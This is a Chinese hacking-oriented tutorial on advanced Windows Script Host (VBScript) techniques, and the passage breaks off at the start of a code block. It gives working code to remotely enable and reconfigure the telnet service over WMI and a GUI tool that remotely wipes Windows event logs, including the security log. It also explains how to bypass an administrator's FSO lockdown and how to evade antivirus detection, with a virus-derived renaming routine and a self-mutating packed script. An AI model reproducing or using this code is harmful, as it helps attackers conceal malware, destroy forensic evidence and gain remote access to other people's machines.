快捷導(dǎo)航

深入挖掘Windows腳本技術(shù)

更新時(shí)間：2006年09月08日 00:00:00 作者：

深入挖掘Windows腳本技術(shù)

文章作者：zzzEVAzzz <zzzevazzz@126.com>

為使文中涉及的代碼整潔，將使用論壇的PHP標(biāo)簽處理。（沒有VBS標(biāo)簽，code標(biāo)簽不好用，郁悶）
如果轉(zhuǎn)載本文，請注意做相應(yīng)調(diào)整。

【目錄】
1，前言
2，回顧WSH對象
3，WMI服務(wù)
4，腳本也有GUI
5，反查殺
6，來做個(gè)后門
7，結(jié)語
8，參考資料

【前言】
本文講述一些Windows腳本編程的知識和技巧。這里的Windows腳本是指"Windows Script Host"(WSH Windows腳本宿主)，而不是HTML或ASP中的腳本。前者由Wscript或Cscript解釋，后兩者分別由IE和IIS負(fù)責(zé)解釋。描述的語言是VBScript。本文假設(shè)讀者有一定的Windows腳本編程的基礎(chǔ)。如果你對此還不了解，請先學(xué)習(xí)《Windows腳本技術(shù)》[1]。

【回顧WSH對象】
得益于com技術(shù)的支持，WSH能提供比批處理(.bat)更強(qiáng)大的功能。說白了，wsh不過是調(diào)用現(xiàn)成的“控件”作為一個(gè)對象，用對象的屬性和方法實(shí)現(xiàn)目的。

常用的對象有：
WScript
Windows腳本宿主對象模型的根對象，要使用WSH自然離不開它。它提供多個(gè)子對象，比如WScript.Arguments和WScript.Shell。前者提供對整個(gè)命令行參數(shù)集的訪問，后者可以運(yùn)行程序、操縱注冊表內(nèi)容、創(chuàng)建快捷方式或訪問系統(tǒng)文件夾。

Scripting.FileSystemObject
主要為IIS設(shè)計(jì)的對象，訪問文件系統(tǒng)。這個(gè)恐怕是大家遇到最多的對象了，因?yàn)閹缀跛械腤indows腳本病毒都要通過它復(fù)制自己感染別人。

ADODB.Stream
ActiveX Data Objects數(shù)據(jù)庫的子對象，提供流方式訪問文件的功能。這雖然屬于數(shù)據(jù)庫的一部分，但感謝微軟，ADO是系統(tǒng)自帶的。

Microsoft.XMLHTTP
為支持XML而設(shè)計(jì)的對象，通過http協(xié)議訪問網(wǎng)絡(luò)。常用于跨站腳本執(zhí)行漏洞和SQL injection。

還有很多不常見的：
活動目錄服務(wù)接口(ADSI)相關(guān)對象 —— 功能涉及范圍很廣，主要用于Windows域管理。
InternetExplorer對象 —— 做IE能做的各種事。
Word，Excel，Outlook對象 —— 用來處理word文檔，excel表單和郵件。
WBEM對象 —— WBEM即Web-Based Enterprise Management。它為管理Windows提供強(qiáng)大的功能支持。下一節(jié)提到的WMI服務(wù)提供該對象的接口。

很顯然，WSH可以利用的對象遠(yuǎn)遠(yuǎn)不止這些。本文掛一漏萬，談一些較實(shí)用的對象及其用法。
先看一個(gè)支持?jǐn)帱c(diǎn)續(xù)傳下載web資源的例子，它用到了上面說的4個(gè)常用對象。

復(fù)制代碼代碼如下:

if (lcase(right(wscript.fullname,11))="wscript.exe") then     '判斷腳本宿主的名稱' 
  die("Script host must be CScript.exe.")               '腳本宿主不是CScript，于是就die了' 
end if 

if wscript.arguments.count<1 then                     '至少要有一個(gè)參數(shù)' 
  die("Usage: cscript webdl.vbs url [filename]")         '麻雀雖小五臟俱全，Usage不能忘' 
end if 

url=wscript.arguments(0)                           '參數(shù)數(shù)組下標(biāo)從0開始' 
if url="" then die("URL can't be null.")               '敢唬我，空url可不行' 
if wscript.arguments.count>1 then                     '先判斷參數(shù)個(gè)數(shù)是否大于1' 
  filename=wscript.arguments(1)                     '再訪問第二個(gè)參數(shù)' 
else                                       '如果沒有給出文件名，就從url中獲得' 
  t=instrrev(url,"/")                           '獲得最后一個(gè)"/"的位置' 
  if t=0 or t=len(url) then die("Can not get filename to save.")   '沒有"/"或以"/"結(jié)尾' 
  filename=right(url,len(url)-t)                     '獲得要保存的文件名' 
end if 
if not left(url,7)="http://" then url="http://"&url         '如果粗心把“http://”忘了，加上' 

set fso=wscript.createobject("Scripting.FileSystemObject")   'FSO，ASO，HTTP三個(gè)對象一個(gè)都不能少' 
set aso=wscript.createobject("ADODB.Stream") 
set http=wscript.createobject("Microsoft.XMLHTTP") 

if fso.fileexists(filename) then                     '判斷要下載的文件是否已經(jīng)存在' 
  start=fso.getfile(filename).size                   '存在，以當(dāng)前文件大小作為開始位置' 
else 
  start=0                                   '不存在，一切從零開始' 
  fso.createtextfile(filename).close                 '新建文件' 
end if 

wscript.stdout.write "Connectting..."                 '好戲剛剛開始' 
current=start                                 '當(dāng)前位置即開始位置' 
do 
  http.open "GET",url,true                         '這里用異步方式調(diào)用HTTP' 
  http.setrequestheader "Range","bytes="&start&"-"&cstr(start+20480) '斷點(diǎn)續(xù)傳的奧秘就在這里' 
  http.setrequestheader "Content-Type:","application/octet-stream" 
  http.send                                   '構(gòu)造完數(shù)據(jù)包就開始發(fā)送' 

  for i=1 to 120                               '循環(huán)等待' 
    if http.readystate=3 then showplan()               '狀態(tài)3表示開始接收數(shù)據(jù)，顯示進(jìn)度' 
    if http.readystate=4 then exit for               '狀態(tài)4表示數(shù)據(jù)接受完成' 
    wscript.sleep 500                           '等待500ms' 
  next 
  if not http.readystate=4 then die("Timeout.")           '1分鐘還沒下完20k？超時(shí)！' 
  if http.status>299 then die("Error: "&http.status&" "&http.statustext) '不是吧，又出錯(cuò)？' 
  if not http.status=206 then die("Server Not Support Partial Content.") '服務(wù)器不支持?jǐn)帱c(diǎn)續(xù)傳' 

  aso.type=1                                 '數(shù)據(jù)流類型設(shè)為字節(jié)' 
  aso.open 
  aso.loadfromfile filename                       '打開文件' 
  aso.position=start                             '設(shè)置文件指針初始位置' 
  aso.write http.responsebody                       '寫入數(shù)據(jù)' 
  aso.savetofile filename,2                       '覆蓋保存' 
  aso.close 

  range=http.getresponseheader("Content-Range")           '獲得http頭中的"Content-Range"' 
  if range="" then die("Can not get range.")             '沒有它就不知道下載完了沒有' 
  temp=mid(range,instr(range,"-")+1)                 'Content-Range是類似123-456/789的樣子' 
  current=clng(left(temp,instr(temp,"/")-1))             '123是開始位置，456是結(jié)束位置' 
  total=clng(mid(temp,instr(temp,"/")+1))               '789是文件總字節(jié)數(shù)' 
  if total-current=1 then exit do                   '結(jié)束位置比總大小少1就表示傳輸完成了' 
  start=start+20480                             '否則再下載20k' 
loop while true 

wscript.echo chr(13)&"Download ("&total&") Done."         '下載完了，顯示總字節(jié)數(shù)' 

function die(msg)                               '函數(shù)名來自Perl內(nèi)置函數(shù)die' 
wscript.echo msg                               '交代遺言^_^' 
wscript.quit                                   '去見馬克思了' 
end function 

function showplan()                             '顯示下載進(jìn)度' 
if i mod 3 = 0 then c="/"                         '簡單的動態(tài)效果' 
if i mod 3 = 1 then c="-" 
if i mod 3 = 2 then c="\" 
wscript.stdout.write chr(13)&"Download ("¤t&") "&c&chr(8)'13號ASCII碼是回到行首，8號是退格' 
end function

可以看到，http控件的功能是很強(qiáng)大的。通過對http頭的操作，很容易就實(shí)現(xiàn)斷點(diǎn)續(xù)傳。例子中只是單線程的，事實(shí)上由于http控件支持異步調(diào)用和事件，也可以實(shí)現(xiàn)多線程下載。在MSDN里有詳細(xì)的用法。至于斷點(diǎn)續(xù)傳的詳細(xì)資料，請看RFC2616。

FSO和ASO都可以訪問文件，他們有什么區(qū)別呢？其實(shí)，ASO除了在訪問字節(jié)（非文本）數(shù)據(jù)有用外，就沒有存在的必要了。如果想把例子中的ASO用FSO來實(shí)現(xiàn)，那么寫入http.responsebody的時(shí)候會出錯(cuò)。反之也不行，ASO無法判斷文件是否存在。如果文件不存在，loadfromfile就直接出錯(cuò)，沒有改正的機(jī)會。當(dāng)然，可以用on error resume next語句讓腳本宿主忽略非致命錯(cuò)誤，自己捕捉并處理。但有現(xiàn)成的fileexists()為什么不用呢？

另外，由于FSO經(jīng)常被腳本病毒和ASP木馬利用，所以管理員可能會在注冊表中修改該控件的信息，使腳本無法創(chuàng)建FSO。其實(shí)執(zhí)行一個(gè)命令regsvr32 /s scrrun.dll就恢復(fù)了。即使scrrun.dll被刪除，自己復(fù)制一個(gè)過去就行。

熱身完之后，下面我們來看一個(gè)功能強(qiáng)大的對象——WBEM（由WMI提供）。

【W(wǎng)MI服務(wù)】
先看看MSDN里是怎么描述WMI的——Windows 管理規(guī)范 (WMI) 是可伸縮的系統(tǒng)管理結(jié)構(gòu)，它采用一個(gè)統(tǒng)一的、基于標(biāo)準(zhǔn)的、可擴(kuò)展的面向?qū)ο蠼涌凇Ｎ以趧傞_始理解WMI的時(shí)候，總以為WMI是"Windows管理接口"(Interface)，呵呵。

再看什么是WMI服務(wù)——提供共同的界面和對象模式以便訪問有關(guān)操作系統(tǒng)、設(shè)備、應(yīng)用程序和服務(wù)的管理信息。如果此服務(wù)被終止，多數(shù)基于Windows的軟件將無法正常運(yùn)行。如果此服務(wù)被禁用，任何依賴它的服務(wù)將無法啟動。

看上去似乎是個(gè)很重要的服務(wù)。不過，默認(rèn)情況下并沒有服務(wù)依賴它，反而是它要依賴RPC和EventLog服務(wù)。但它又是時(shí)常用到的。我把WMI服務(wù)設(shè)置為手動啟動并停止，使用電腦一段時(shí)間，發(fā)現(xiàn)WMI服務(wù)又啟動了。被需要就啟動，這是服務(wù)設(shè)置為“手動”的特點(diǎn)。當(dāng)我知道WMI提供的管理信息有多龐大后，對WMI服務(wù)的自啟動就不感到奇怪了。

想直觀了解WMI的復(fù)雜，可以使用WMITools.exe[2]這個(gè)工具。這是一個(gè)工具集。使用其中的WMI Object Browser可以看到很多WMI提供的對象，其復(fù)雜程度不亞于注冊表。更重要的是，WMI還提供動態(tài)信息，比如當(dāng)前進(jìn)程、服務(wù)、用戶等。

WMI的邏輯結(jié)構(gòu)是這樣的：
首先是WMI使用者，比如腳本（確切的說是腳本宿主）和其他用到WMI接口的應(yīng)用程序。由WMI使用者訪問CIM對象管理器WinMgmt（即WMI服務(wù)），后者再訪問CIM(公共信息模型Common Information Model)儲存庫。靜態(tài)或動態(tài)的信息（對象的屬性）就保存在CIM庫中，同時(shí)還存有對象的方法。一些操作，比如啟動一個(gè)服務(wù)，通過執(zhí)行對象的方法實(shí)現(xiàn)。這實(shí)際上是通過COM技術(shù)調(diào)用了各種dll。最后由dll中封裝的API完成請求。

WMI是事件驅(qū)動的，操作系統(tǒng)、服務(wù)、應(yīng)用程序、設(shè)備驅(qū)動程序等都可作為事件源，通過COM接口生成事件通知。WinMgmt捕捉到事件，然后刷新CIM庫中的動態(tài)信息。這也是為什么WMI服務(wù)依賴EventLog的原因。

說完概念，我們來看看具體如何操作WMI接口。
下面這個(gè)例子的代碼來自我寫的腳本RTCS。它是遠(yuǎn)程配置telnet服務(wù)的腳本。
這里只列出關(guān)鍵的部分：

首先是創(chuàng)建對象并連接服務(wù)器：

復(fù)制代碼代碼如下:

set objlocator=createobject("wbemscripting.swbemlocator") 
set objswbemservices=objlocator.connectserver(ipaddress,"root\default",username,password) 

第一句創(chuàng)建一個(gè)服務(wù)定位對象，然后第二句用該對象的connectserver方法連接服務(wù)器。
除了IP地址、用戶名、密碼外，還有一個(gè)名字空間參數(shù)root\default。
就像注冊表有根鍵一樣，CIM庫也是分類的。用面向?qū)ο蟮男g(shù)語來描述就叫做“名字空間”(Name Space)。
由于RTCS要處理NTLM認(rèn)證方式和telnet服務(wù)端口，所以需要訪問注冊表。而操作注冊表的對象在root\default。

復(fù)制代碼代碼如下:

set objinstance=objswbemservices.get("stdregprov")     '實(shí)例化stdregprov對象' 
set objmethod=objinstance.methods_("SetDWORDvalue")   'SetDWORDvalue方法本身也是對象' 
set objinparam=objmethod.inparameters.spawninstance_() '實(shí)例化輸入?yún)?shù)對象' 
objinparam.hdefkey=&h80000002                   '根目錄是HKLM，代碼80000002(16進(jìn)制)' 
objinparam.ssubkeyname="SOFTWARE\Microsoft\TelnetServer.0"   '設(shè)置子鍵' 
objinparam.svaluename="NTLM"       '設(shè)置鍵值名' 
objinparam.uvalue=ntlm           '設(shè)置鍵值內(nèi)容，ntlm是變量，由用戶輸入?yún)?shù)決定' 
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) '執(zhí)行方法' 

然后設(shè)置端口

復(fù)制代碼代碼如下:

objinparam.svaluename="TelnetPort" 
objinparam.uvalue=port           'port也是由用戶輸入的參數(shù)' 
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) 

看到這里你是不是覺得有些頭大了呢？又是名字空間，又是類的實(shí)例化。我在剛開始學(xué)習(xí)WMI的時(shí)候也覺得很不習(xí)慣。記得我的初中老師說過，讀書要先把書讀厚，再把書讀薄。讀厚是因?yàn)榧尤肓俗约旱南敕?，讀薄是因?yàn)榘盐找I(lǐng)了。
我們現(xiàn)在就把書讀薄。上面的代碼可以改為：

復(fù)制代碼代碼如下:

 
set olct=createobject("wbemscripting.swbemlocator") 
set oreg=olct.connectserver(ip,"root\default",user,pass).get("stdregprov") 
HKLM=&h80000002 
out=oreg.setdwordvalue(HKLM,"SOFTWARE\Microsoft\TelnetServer.0","NTLM",ntlm) 
out=oreg.setdwordvalue(HKLM,"SOFTWARE\Microsoft\TelnetServer.0","TelnetPort",port) 

現(xiàn)在是不是簡單多了？

接著是對telnet服務(wù)狀態(tài)的控制。

復(fù)制代碼代碼如下:

set objswbemservices=objlocator.connectserver(ipaddress,"root\cimv2",username,password) 
set colinstances=objswbemservices.execquery("select * from win32_service where name='tlntsvr'") 

這次連接的是root\cimv2名字空間。然后采用wql(sql for WMI)搜索tlntsvr服務(wù)。熟悉sql語法的一看就知道是在做什么了。這樣得到的是一組Win32_Service實(shí)例，雖然where語句決定了該組總是只有一個(gè)成員。
為簡單起見，假設(shè)只要切換服務(wù)狀態(tài)。

復(fù)制代碼代碼如下:

for each objinstance in colinstances 
  if objinstance.started=true then         '根據(jù)started屬性判斷服務(wù)是否已經(jīng)啟動' 
    intstatus=objinstance.stopservice()     '是，調(diào)用stopservice停止服務(wù)' 
  else 
    intstatus=objinstance.startservice()     '否，調(diào)用startservice啟動服務(wù)' 
  end if 
next 

關(guān)鍵的代碼就是這些了，其余都是處理輸入輸出和容錯(cuò)的代碼。
總結(jié)一下過程：
1，連接服務(wù)器和合適的名字空間。
2，用get或execquery方法獲得所需對象的一個(gè)或一組實(shí)例。
3，讀寫對象的屬性，調(diào)用對象的方法。

那么，如何知道要連接哪個(gè)名字空間，獲得哪些對象呢？《WMI技術(shù)指南》[3]中分類列出了大量常用的對象?？上鼪]有相應(yīng)的電子書，你只有到書店里找它了。你也可以用WMITools里WMI CIM Studio這個(gè)工具的搜索功能，很容易就能找想要的對象。找到對象后，WMI CIM Studio能列出其屬性和方法，然后到MSDN里找具體的幫助。而應(yīng)用舉例，除了我寫的7個(gè)RS系列腳本，還有參考資料[4]。

需要特別說明的是，在參考資料[4]中，連接服務(wù)器和名字空間用的是類似如下的語法：
Codz:
Set objWMIService=GetObject("winmgmts:!\"&strComputer&"\root\cimv2:Win32_Process")

詳細(xì)的語法在《WMI技術(shù)指南》和MSDN中有介紹，但我們不關(guān)心它，因?yàn)檫@種辦法沒有用戶名和密碼參數(shù)。因此，只有在當(dāng)前用戶在目標(biāo)系統(tǒng)（含本地）有登陸權(quán)限的情況下才能使用。而connectserver如果要本地使用，第一個(gè)參數(shù)可以是127.0.0.1或者一個(gè)點(diǎn)"."，第3、4個(gè)參數(shù)都是空字符串""。

最后，訪問WMI還有一個(gè)“特權(quán)”的問題。如果你看過ROTS的代碼，你會發(fā)現(xiàn)有兩句“奇怪”的語句：
Codz:
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

這是在向WMI服務(wù)申請權(quán)限。18和23都是權(quán)限代號。下面列出一些重要的代號：
5 在域中創(chuàng)建帳戶
7 管理審計(jì)并查看、保存和清理安全日志
9 加載和卸載設(shè)備驅(qū)動
10 記錄系統(tǒng)時(shí)間
11 改變系統(tǒng)時(shí)間
18 在本地關(guān)機(jī)
22 繞過歷遍檢查
23 允許遠(yuǎn)程關(guān)機(jī)

詳細(xì)信息還是請看《WMI技術(shù)指南》或MSDN。
所有特權(quán)默認(rèn)是沒有的。我在寫RCAS時(shí)，因?yàn)橥松暾執(zhí)貦?quán)11，結(jié)果一直測試失敗，很久才找到原因。
只要有權(quán)限連接WMI服務(wù)，總能成功申請到需要的特權(quán)。這種特權(quán)機(jī)制，只是為了約束應(yīng)用程序的行為，加強(qiáng)系統(tǒng)穩(wěn)定性。有點(diǎn)奇怪的是，訪問注冊表卻不用申請任何特權(quán)。真不知道微軟的開發(fā)人員是怎么想的，可能是訪問注冊表太普遍了。

【腳本也有GUI】
雖然系統(tǒng)提供了WScript和CScript兩個(gè)腳本宿主，分別負(fù)責(zé)窗口環(huán)境和命令行環(huán)境下的腳本運(yùn)行，但實(shí)際上窗口環(huán)境下用戶與腳本交互不太方便：參數(shù)輸入只能建立快捷方式或彈出InputBox對話框，輸出信息后只有在用戶“確定”后才能繼續(xù)運(yùn)行。完全沒有了窗口環(huán)境直觀、快捷的優(yōu)勢。好在有前面提到的InternetExplorer對象，腳本可以提供web風(fēng)格的GUI。

還是來看個(gè)例子，一個(gè)清除系統(tǒng)日志的腳本，順便復(fù)習(xí)一下WMI：

復(fù)制代碼代碼如下:

 
set ie=wscript.createobject("internetexplorer.application","event_")   '創(chuàng)建ie對象' 
ie.menubar=0                                       '取消菜單欄' 
ie.addressbar=0                                     '取消地址欄' 
ie.toolbar=0                                       '取消工具欄' 
ie.statusbar=0                                       '取消狀態(tài)欄' 
ie.width=400                                       '寬400' 
ie.height=400                                       '高400' 
ie.resizable=0                                       '不允許用戶改變窗口大小' 
ie.navigate "about"&":blank"                             '打開空白頁面' 
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2)   '水平居中' 
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2) '垂直居中' 
ie.visible=1                                       '窗口可見' 

with ie.document                                 '以下調(diào)用document.write方法，' 
.write "<html><body bgcolor=#dddddd scroll=no>"             '寫一段html到ie窗口中。' 
.write "<h2 align=center>遠(yuǎn)程清除系統(tǒng)日志</h2><br>" 
.write "<p>目標(biāo)IP：<input id=ip type=text size=15>"           '也可以用navigate方法直接打開一' 
.write "<p>用戶名：<input id=user type=text size=30>"         '個(gè)html文件，效果是一樣的。' 
.write "<p>密碼：　<input id=pass type=password size=30>" 
.write "<p align=center>類型："                       '不僅是input對象，所有DHTML支持' 
.write "<input id=app type=checkbox>應(yīng)用程序 "             '的對象及其屬性、方法都可以使用。' 
.write "<input id=sys type=checkbox>系統(tǒng) " 
.write "<input id=sec type=checkbox>安全"                 '訪問這些對象的辦法和網(wǎng)頁中訪問' 
.write "<p align=center><br>"                         '框架內(nèi)對象是類似的。' 
.write "<input id=confirm type=button value=確定> " 
.write "<input id=cancel type=button value=取消>" 
.write "</body></html>" 
end with 

dim wmi                                       '顯式定義一個(gè)全局變量' 
set wnd=ie.document.parentwindow                       '設(shè)置wnd為窗口對象' 
set id=ie.document.all                             '設(shè)置id為document中全部對象的集合' 
id.confirm.onclick=getref("confirm")                     '設(shè)置點(diǎn)擊"確定"按鈕時(shí)的處理函數(shù)' 
id.cancel.onclick=getref("cancel")                     '設(shè)置點(diǎn)擊"取消"按鈕時(shí)的處理函數(shù)' 

do while true                                   '由于ie對象支持事件，所以相應(yīng)的，' 
wscript.sleep 200                                 '腳本以無限循環(huán)來等待各種事件。' 
loop 

sub event_onquit                                 'ie退出事件處理過程' 
wscript.quit                                     '當(dāng)ie退出時(shí)，腳本也退出' 
end sub 

sub cancel                                     '"取消"事件處理過程' 
ie.quit                                       '調(diào)用ie的quit方法，關(guān)閉IE窗口' 
end sub                                       '隨后會觸發(fā)event_onquit，于是腳本也退出了' 

sub confirm                                     '"確定"事件處理過程，這是關(guān)鍵' 
with id 
if .ip.value="" then .ip.value="."                     '空ip值則默認(rèn)是對本地操作' 
if not (.app.checked or .sys.checked or .sec.checked) then     'app等都是checkbox，通過檢測其checked' 
  wnd.alert("至少選擇一種日志")                       '屬性，來判斷是否被選中。' 
  exit sub 
end if 
set lct=createobject("wbemscripting.swbemlocator")           '創(chuàng)建服務(wù)器定位對象' 
on error resume next                               '使腳本宿主忽略非致命錯(cuò)誤' 
set wmi=lct.connectserver(.ip.value,"root/cimv2",.user.value,.pass.value) '連接到root/cimv2名字空間' 
if err.number then                                 '自己捕捉錯(cuò)誤并處理' 
  wnd.alert("連接WMI服務(wù)器失敗")                       '這里只是簡單的顯示“失敗”' 
  err.clear 
  on error goto 0                                 '仍然讓腳本宿主處理全部錯(cuò)誤' 
  exit sub 
end if 
if .app.checked then clearlog "application"               '清除每種選中的日志' 
if .sys.checked then clearlog "system" 
if .sec.checked then clearlog "security"                 '注意，在XP下有限制，不能清除安全日志' 
wnd.alert("日志已清除") 
end with 
end sub 

sub clearlog(name) 
wql="select * from Win32_NTEventLogFile where logfilename='"&name&"'" 
set logs=wmi.execquery(wql)                           '注意，logs的成員不是每條日志，' 
for each l in logs                                 '而是指定日志的文件對象。' 
  if l.cleareventlog() then 
    wnd.alert("清除日志"&name&"時(shí)出錯(cuò)！") 
    ie.quit 
    wscript.quit 
  end if 
next 
end sub 

總結(jié)一下整個(gè)過程。首先是創(chuàng)建internetexplorer.application對象。其直接的效果是啟動了一個(gè)iexplorer進(jìn)程，但窗口是不可見的，直到設(shè)置了ie.visible=1。然后用document.write方法將html語句寫到ie窗口中。對于復(fù)雜的界面，可以將html代碼保存為一個(gè)html文件，用ie.navigate(filename)打開。最后是響應(yīng)窗口中的輸入。這基本上屬于DHTML的知識范疇。

與一般腳本編程最大的不同之處，在于ie是事件驅(qū)動的。你所要做的，就是設(shè)置好相應(yīng)的事件處理函數(shù)/過程。
在本例中，腳本只關(guān)心3個(gè)事件：ie退出，"確定"按鈕被點(diǎn)擊，"取消"按鈕被點(diǎn)擊。

注意，例子中只有兩句設(shè)置事件處理過程的語句，沒有定義ie退出事件與event_onquit過程關(guān)聯(lián)。這是因?yàn)檫@里用到一個(gè)特性——?jiǎng)?chuàng)建ie對象時(shí)的第二個(gè)參數(shù)"event_"是一個(gè)前綴，ie對象的事件處理過程名是該前綴加事件名。所以onquit事件的處理過程默認(rèn)就是event_onquit。

當(dāng)點(diǎn)擊"確定"按鈕后，confirm過程被調(diào)用。例子中演示了如何訪問ie中的對象，比如ie.document.all.ip.value就是在"目標(biāo)IP"文本框中的輸入。如果選中"應(yīng)用程序"這個(gè)checkbox，那么ie.document.all.app.checked的值是true，否則是false。想調(diào)用alert方法，則用ie.document.parentwindow.alert。其他各種ie內(nèi)對象的訪問方法完全是類似的。具體的可以看DHTML相關(guān)資料。

有了web界面，交互就變得豐富多彩了。大家可以充分發(fā)揮創(chuàng)意。

比如，很多GUI工具(比如流光)啟動時(shí)，有一個(gè)logo頁，顯示版權(quán)等信息。我們用ie對象也可以模擬一個(gè)出來：

復(fù)制代碼代碼如下:

 
set ie=wscript.createobject("internetexplorer.application") 
ie.fullscreen=1 
ie.width=300 
ie.height=150 
ie.navigate "about"&":blank" 
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2) 
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2) 
ie.document.write "<body bgcolor =skyblue scroll=no><br><br>"&_ 
"<h2 align=center>這是一個(gè)Logo</h2></body>" 
ie.visible=1 
wscript.sleep 5000 
ie.quit 

上面這段代碼執(zhí)行后，將在屏幕中央顯示一個(gè)連標(biāo)題欄和邊框都沒有的ie窗口，持續(xù)5秒。
窗口里是藍(lán)底黑字的“這是一個(gè)Logo”。

腳本GUI化之后，與用戶的交互更直觀。像Nmap那樣有很多參數(shù)的工具，在本地使用時(shí)，寫一個(gè)圖形界面的“接口”就一勞永逸了。輸出的結(jié)果也可以用腳本處理，以更適合閱讀的方式顯示，就像流光等工具能生成html掃描報(bào)告那樣。

【反查殺】
首先必須說明的是，我完全沒有試圖挑戰(zhàn)殺毒軟件殺毒能力的意思。Windows腳本是一種解釋性語言，明文保存代碼。由于沒有經(jīng)過編譯過程，代碼的復(fù)雜程度遠(yuǎn)不如可執(zhí)行程序(exe)。exe做不到的事，沒理由指望腳本能做到。不過，正因?yàn)槟_本的反查殺能力很差，以至于殺毒軟件使用的查殺辦法也不高級。于是我們就有機(jī)可乘了。

先看看常見的反查殺辦法：
1，字符串或語句的分割/重組。
最典型的例子就是將 fso=createobject("scripting.filesystemobject")
變成 fso=createobject("script"+"ing.filesyste"+"mobject")
這種辦法的擴(kuò)展是用execute語句：
execute("fso=crea"+"teobject(""scr"+"ipting.filesy"+"stemobject"")")

2，變量名自動改變。
Codz:
Randomize
Set Of = CreateObject("Scripting.FileSystemObject")
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
fS = Array("Of", "vC", "fS", "fSC")
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC

上面這段代碼取自愛蟲病毒，大家運(yùn)行一下，就知道是怎么回事了。

3，用官方工具——腳本編碼器screnc.exe[5]加密腳本。
加密后的腳本能被腳本宿主直接解釋。本來這是最好的解決辦法，但“槍打出頭鳥”，由于加密是可逆的，現(xiàn)在所有的殺毒軟件都有解碼功能。因此這個(gè)辦法的效果基本上為零。

第一個(gè)辦法的有效告訴我們這樣一個(gè)事實(shí)：對腳本病毒的查殺基本上是屬于靜態(tài)的。而且，我發(fā)現(xiàn)即使只是改變大小寫，也能起到反查效果(只試了一種殺毒軟件)。反查殺的關(guān)鍵是減少特征碼。

對于exe的反查殺，最容易想到的就是“加殼”。在腳本上也可以應(yīng)用這個(gè)辦法。比如：
Codz:
str="cswpire.tohcO"" ""!K"
for i=1 to len(str) step 3
rev=rev+strreverse(mid(str,i,3))
next
execute rev

一個(gè)最簡單的“殼”?！皻ぁ钡乃惴ㄊ敲縩個(gè)字符反轉(zhuǎn)順序一次。n就是算法的“種子”，本例中它等于3。
這個(gè)“殼”是死的，起不到減少特征碼的效果。反而增加了特征碼，如"cswpire"。

下面看一個(gè)復(fù)雜些的例子：
Codz:
str="wscript.echo ""OK!"":randomize:key=int(rnd*8+2):str=rev:str=replace(str,chr(34),chr(34)+chr(34)):set aso=createobject(""ADODB.Stream""):with aso:.open:.writetext ""str=""+chr(34)+str+chr(34)+"":key=""+cstr(key)+"":str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function"":.savetofile wscript.scriptfullname,2:end with":key=1:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function

（注意，該代碼只有一行，沒有回車）

保存成vbs文件，雙擊執(zhí)行，效果還是和前一段代碼一樣，彈出一個(gè)對話框顯示"OK!"。
但是，執(zhí)行完后再看代碼，可能變成了這樣：
Codz:
str="tpircsw"" ohce.ar:""!KOezimodnni=yek:8*dnr(trts:)2+ts:ver=alper=r,rts(ec)43(rhc43(rhc,3(rhc+)tes:))4rc=osa jboetaeDA""(tcertS.BDOw:)""maeosa hti:nepo.:tetirw.ts"" txerhc+""=rts+)43(3(rhc+rek:""+)4tsc+""=y+)yek(rr=rts:""cexe:verts etuitcnuf:(ver noi rof:)l ot 1=)rts(nek pets =ver:yerts+veresreverts(dim(yek,i,rtxen:))uf dne:""noitcntevas.:w elifo.tpircsftpircsemanllu dne:2,htiw":key=7:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function

再執(zhí)行，又變成其他樣子了。這個(gè)腳本是自變形的。

如果仔細(xì)看代碼就會發(fā)現(xiàn)，“殼”的算法依舊，而“種子”隨機(jī)改變。但是，加殼過的內(nèi)容每次不同了，“殼”本身還是沒有任何改變。很多exe加殼工具加的殼，本身就被當(dāng)作惡意代碼來提取特征碼。為了更好的反查殺，腳本的“殼”也需要?jiǎng)討B(tài)改變。這就要用到所謂的多態(tài)技術(shù)。不過，exe的多態(tài)是用來反動態(tài)查殺的，而腳本的“多態(tài)”只是應(yīng)付靜態(tài)查殺，兩者有很大不同。

對于exe，真正的多態(tài)目前還未聽說被實(shí)現(xiàn)的。腳本也只能做多少算多少。
不影響功能的變形方法，除了上面提到的3種，還有：
1，隨機(jī)改變大小寫；
2，冒號(:)與回車符隨機(jī)互換（字符串內(nèi)和"then"之后的冒號除外）；
3，字符串分割時(shí)，"+"與"&"隨機(jī)互換；
4，()+-*/&,等字符兩邊任意添加空格或續(xù)行符(_)和回車符的組合；
5，用自定義函數(shù)替換內(nèi)置函數(shù)；即使自定義的函數(shù)只是簡單的封裝內(nèi)置函數(shù)，但至少改變了關(guān)鍵字的位置。
…………
還有其他“多態(tài)”算法有待你的研究。

這些算法的應(yīng)用，是以大幅增加代碼長度為前提的。如果想寫一個(gè)比較完美的“殼”，相信會涉及到“文法分析”的知識，因?yàn)槟_本要“讀懂”自己，從而達(dá)到類似Java混淆器的效果，這就很復(fù)雜了，有機(jī)會再和大家探討。下面我們應(yīng)用“語句分割”、“變量名自動改變”、“隨機(jī)大小寫”、“+和&互換”四種方法，看一下效果如何：
Codz:
